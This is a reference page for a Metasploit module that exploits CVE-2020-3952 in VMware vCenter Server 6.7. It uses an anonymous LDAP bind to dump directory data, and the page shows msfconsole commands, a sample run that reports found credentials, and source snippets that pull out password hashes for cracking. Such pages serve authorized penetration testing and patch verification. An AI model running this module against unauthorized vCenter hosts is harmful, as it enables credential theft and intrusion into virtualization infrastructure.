VMware vCenter Server vmdir Information Disclosure - Metasploit
This page contains detailed information about how to use the auxiliary/gather/vmware_vcenter_vmdir_ldap metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.
Module Overview
Name: VMware vCenter Server vmdir Information Disclosure
Module: auxiliary/gather/vmware_vcenter_vmdir_ldap
Source code: modules/auxiliary/gather/vmware_vcenter_vmdir_ldap.rb
Disclosure date: 2020-04-09
Last modification time: 2022-10-13 10:13:27 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 636
List of CVEs: CVE-2020-3952
This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5.
Module Ranking and Traits
Module Ranking:
- normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.
Stability:
- crash-safe: Module should not crash the service.
Side Effects:
- ioc-in-logs: Module leaves signs of a compromise in a log file (Example: SQL injection data found in HTTP log).
Basic Usage
msf > use auxiliary/gather/vmware_vcenter_vmdir_ldap
msf auxiliary(vmware_vcenter_vmdir_ldap) > show targets
... a list of targets ...
msf auxiliary(vmware_vcenter_vmdir_ldap) > set TARGET target-id
msf auxiliary(vmware_vcenter_vmdir_ldap) > show options
... show and set options ...
msf auxiliary(vmware_vcenter_vmdir_ldap) > exploit
Required Options
- RHOSTS: The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
Knowledge Base
Vulnerable Application
Description
This module uses an anonymous-bind LDAP connection to dump data from the vmdir service in VMware vCenter Server version 6.7 prior to the 6.7U3f update, only if upgraded from a previous release line, such as 6.0 or 6.5.
Setup
Tested in the wild. No setup notes available at this time, as setup will be specific to target environment.
Verification Steps
Actions
Dump
Dump all LDAP data from the vCenter Server.
Options
BASE_DN
If you already have the LDAP base DN, you may set it in this option.
Scenarios
VMware vCenter Server 6.7 virtual appliance on ESXi
msf5 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > options
Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
RPORT 636 yes The target port
SSL true no Enable SSL on the LDAP connection
Auxiliary action:
Name Description
---- -----------
Dump Dump all LDAP data
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > set rhosts [redacted]
rhosts => [redacted]
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) > run
[*] Running module against [redacted]
not verifying SSL hostname of LDAPS server '[redacted]:636'
[*] Discovering base DN automatically
[*] Searching root DSE for base DN
dn: cn=DSE Root
namingcontexts: dc=vsphere,dc=local
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.1
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.2
supportedcontrol: 1.3.6.1.4.1.4203.1.9.1.3
supportedcontrol: 1.2.840.113556.1.4.417
supportedcontrol: 1.2.840.113556.1.4.319
supportedldapversion: 3
supportedsaslmechanisms: GSSAPI
[+] Discovered base DN: dc=vsphere,dc=local
[*] Dumping LDAP data from vmdir service at [redacted]:636
[+] [redacted]:636 is vulnerable to CVE-2020-3952
[*] Storing LDAP data in loot
[+] Saved LDAP data to /Users/wvu/.msf4/loot/20200417002613_default_[redacted]_VMwarevCenterS_939568.txt
[*] Password and lockout policy:
vmwpasswordchangeautounlockintervalsec: [redacted]
vmwpasswordchangefailedattemptintervalsec: [redacted]
vmwpasswordchangemaxfailedattempts: [redacted]
vmwpasswordlifetimedays: [redacted]
vmwpasswordmaxidenticaladjacentchars: [redacted]
vmwpasswordmaxlength: [redacted]
vmwpasswordminalphabeticcount: [redacted]
vmwpasswordminlength: [redacted]
vmwpasswordminlowercasecount: [redacted]
vmwpasswordminnumericcount: [redacted]
vmwpasswordminspecialcharcount: [redacted]
vmwpasswordminuppercasecount: [redacted]
vmwpasswordprohibitedpreviouscount: [redacted]
[+] Credentials found: [redacted]
[snip]
[*] Auxiliary module execution completed
msf5 auxiliary(gather/vmware_vcenter_vmdir_ldap) >
Go back to menu.
Msfconsole Usage
Here is how the gather/vmware_vcenter_vmdir_ldap auxiliary module looks in the msfconsole:
msf6 > use auxiliary/gather/vmware_vcenter_vmdir_ldap
msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show info
Name: VMware vCenter Server vmdir Information Disclosure
Module: auxiliary/gather/vmware_vcenter_vmdir_ldap
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2020-04-09
Provided by:
Hynek Petrak
wvu <[email protected]>
Module side effects:
ioc-in-logs
Module stability:
crash-safe
Available actions:
Name Description
---- -----------
Dump Dump all LDAP data
Check supported:
No
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 636 yes The target port
SSL true no Enable SSL on the LDAP connection
Description:
This module uses an anonymous-bind LDAP connection to dump data from
the vmdir service in VMware vCenter Server version 6.7 prior to the
6.7U3f update, only if upgraded from a previous release line, such
as 6.0 or 6.5.
References:
https://nvd.nist.gov/vuln/detail/CVE-2020-3952
https://www.vmware.com/security/advisories/VMSA-2020-0006.html
Module Options
This is a complete list of options available in the gather/vmware_vcenter_vmdir_ldap auxiliary module:
msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show options
Module options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
Name Current Setting Required Description
---- --------------- -------- -----------
BASE_DN no LDAP base DN if you already have it
BIND_DN no The username to authenticate to LDAP server
BIND_PW no Password for the BIND_DN
RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
RPORT 636 yes The target port
SSL true no Enable SSL on the LDAP connection
Auxiliary action:
Name Description
---- -----------
Dump Dump all LDAP data
Advanced Options
Here is a complete list of advanced options supported by the gather/vmware_vcenter_vmdir_ldap auxiliary module:
msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show advanced
Module advanced options (auxiliary/gather/vmware_vcenter_vmdir_ldap):
Name Current Setting Required Description
---- --------------- -------- -----------
LDAP::ConnectTimeout 10.0 yes Timeout for LDAP connect
VERBOSE false no Enable detailed status messages
WORKSPACE no Specify the workspace for this module
Auxiliary Actions
This is a list of all auxiliary actions that the gather/vmware_vcenter_vmdir_ldap module can do:
msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show actions
Auxiliary actions:
Name Description
---- -----------
Dump Dump all LDAP data
Evasion Options
Here is the full list of possible evasion options supported by the gather/vmware_vcenter_vmdir_ldap auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):
msf6 auxiliary(gather/vmware_vcenter_vmdir_ldap) > show evasion
Module evasion options:
Name Current Setting Required Description
---- --------------- -------- -----------
Go back to menu.
Error Messages
This module may fail with the following error messages:
- Falling back on default base DN dc=vsphere,dc=local
- <PEER> is NOT vulnerable to CVE-2020-3952
- Could not store LDAP data in loot
- No password hashes found
- Type <TYPE> hash length is not 128 digits (<DN>)
- Type <TYPE> salt length is not 32 digits (<DN>)
- Hash type <TYPE.INSPECT> is not supported yet (<DN>)
Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.
Falling back on default base DN dc=vsphere,dc=local
Here is a relevant code snippet related to the "Falling back on default base DN dc=vsphere,dc=local" error message:
74: print_status("User-specified base DN: #{base_dn}")
75: else
76: print_status('Discovering base DN automatically')
77:
78: unless (@base_dn = discover_base_dn(ldap))
79: print_warning('Falling back on default base DN dc=vsphere,dc=local')
80: end
81: end
82:
83: print_status("Dumping LDAP data from vmdir service at #{peer}")
84:
<PEER> is NOT vulnerable to CVE-2020-3952
Here is a relevant code snippet related to the "<PEER> is NOT vulnerable to CVE-2020-3952" error message:
87: entries = ldap.search(base: base_dn, attributes: %w[* + -])
88: end
89:
90: # Look for an entry with a non-empty vmwSTSPrivateKey attribute
91: unless entries&.find { |entry| entry[:vmwstsprivatekey].any? }
92: print_error("#{peer} is NOT vulnerable to CVE-2020-3952")
93: return Exploit::CheckCode::Safe
94: end
95:
96: print_good("#{peer} is vulnerable to CVE-2020-3952")
97: pillage(entries)
Could not store LDAP data in loot
Here is a relevant code snippet related to the "Could not store LDAP data in loot" error message:
117: nil, # filename
118: "Base DN: #{base_dn}" # info
119: )
120:
121: unless ldif_filename
122: print_error('Could not store LDAP data in loot')
123: return
124: end
125:
126: print_good("Saved LDAP data to #{ldif_filename}")
127:
No password hashes found
Here is a relevant code snippet related to the "No password hashes found" error message:
134: process_hashes(entries.select { |entry| entry[:userpassword].any? })
135: end
136:
137: def process_hashes(entries)
138: if entries.empty?
139: print_status('No password hashes found')
140: return
141: end
142:
143: service_details = {
144: workspace_id: myworkspace_id,
Type <TYPE> hash length is not 128 digits (<DN>)
Here is a relevant code snippet related to the "Type <TYPE> hash length is not 128 digits (<DN>)" error message:
158: type, hash, salt = entry[:userpassword].first.unpack('CH128H32')
159:
160: case type
161: when 1
162: unless hash.length == 128
163: vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
164: next
165: end
166:
167: unless salt.length == 32
168: vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
Type <TYPE> salt length is not 32 digits (<DN>)
Here is a relevant code snippet related to the "Type <TYPE> salt length is not 32 digits (<DN>)" error message:
163: vprint_error("Type #{type} hash length is not 128 digits (#{dn})")
164: next
165: end
166:
167: unless salt.length == 32
168: vprint_error("Type #{type} salt length is not 32 digits (#{dn})")
169: next
170: end
171:
172: # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
173: john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
Hash type <TYPE.INSPECT> is not supported yet (<DN>)
Here is a relevant code snippet related to the "Hash type <TYPE.INSPECT> is not supported yet (<DN>)" error message:
170: end
171:
172: # https://github.com/magnumripper/JohnTheRipper/blob/2778d2e9df4aa852d0bc4bfbb7b7f3dde2935b0c/doc/DYNAMIC#L197
173: john_hash = "$dynamic_82$#{hash}$HEX$#{salt}"
174: else
175: vprint_error("Hash type #{type.inspect} is not supported yet (#{dn})")
176: next
177: end
178:
179: print_good("Credentials found: #{dn}:#{john_hash}")
180:
Go back to menu.
Related Pull Requests
- #14734 Merged Pull Request: Rubocop recently landed modules
- #13906 Merged Pull Request: Add generic LDAP hashdump module
- #13885 Merged Pull Request: Add LDAPS support and update VMware vCenter Server vmdir (CVE-2020-3952) modules
- #13868 Merged Pull Request: Add hash dumping to auxiliary/gather/vmware_vcenter_vmdir_ldap (CVE-2020-3952)
- #13503 Merged Pull Request: Add BASE_DN and ROOT_KEY options to VMware vCenter vmdir and SaltStack Salt modules
- #13253 Merged Pull Request: Add VMware vCenter Server vmdir Information Disclosure and Authentication Bypass (CVE-2020-3952), plus LDAP mixin
References
See Also
Check also the following modules related to this module:
- auxiliary/gather/ldap_hashdump
- auxiliary/admin/ldap/vmware_vcenter_vmdir_auth_bypass
- auxiliary/scanner/vmware/vmware_enum_permissions
- auxiliary/scanner/vmware/vmware_enum_sessions
- auxiliary/scanner/vmware/vmware_enum_users
- auxiliary/scanner/vmware/vmware_enum_vms
- auxiliary/scanner/vmware/vmware_host_details
- auxiliary/scanner/vmware/vmware_http_login
- auxiliary/scanner/vmware/vmware_screenshot_stealer
- auxiliary/scanner/vmware/vmware_server_dir_trav
- auxiliary/scanner/vmware/vmware_update_manager_traversal
- exploit/linux/http/vmware_nsxmgr_xstream_rce_cve_2021_39144
- exploit/linux/http/vmware_vcenter_analytics_file_upload
- exploit/linux/http/vmware_vcenter_vsan_health_rce
- exploit/linux/http/vmware_view_planner_4_6_uploadlog_rce
- exploit/linux/http/vmware_vrops_mgr_ssrf_rce
- exploit/linux/http/vmware_workspace_one_access_cve_2022_22954
- exploit/linux/local/vmware_alsa_config
- exploit/linux/local/vmware_mount
- exploit/linux/local/vmware_workspace_one_access_certproxy_lpe
- exploit/linux/ssh/vmware_vdp_known_privkey
- exploit/multi/http/vmware_vcenter_log4shell
- exploit/multi/http/vmware_vcenter_uploadova_rce
- exploit/osx/local/vmware_bash_function_root
- exploit/osx/local/vmware_fusion_lpe
- exploit/windows/http/vmware_vcenter_chargeback_upload
- auxiliary/admin/vmware/poweroff_vm
- auxiliary/admin/vmware/poweron_vm
- auxiliary/admin/vmware/tag_vm
- auxiliary/admin/vmware/terminate_esx_sessions
- auxiliary/admin/vmware/vcenter_forge_saml_token
- auxiliary/admin/vmware/vcenter_offline_mdb_extract
- auxiliary/scanner/vmware/esx_fingerprint
- auxiliary/scanner/vmware/vmauthd_login
- auxiliary/scanner/vmware/vmauthd_version
Authors
- Hynek Petrak
- wvu
Version
This page has been produced using Metasploit Framework version 6.2.29-dev. For more modules, visit the Metasploit Module Library.
Go back to menu.
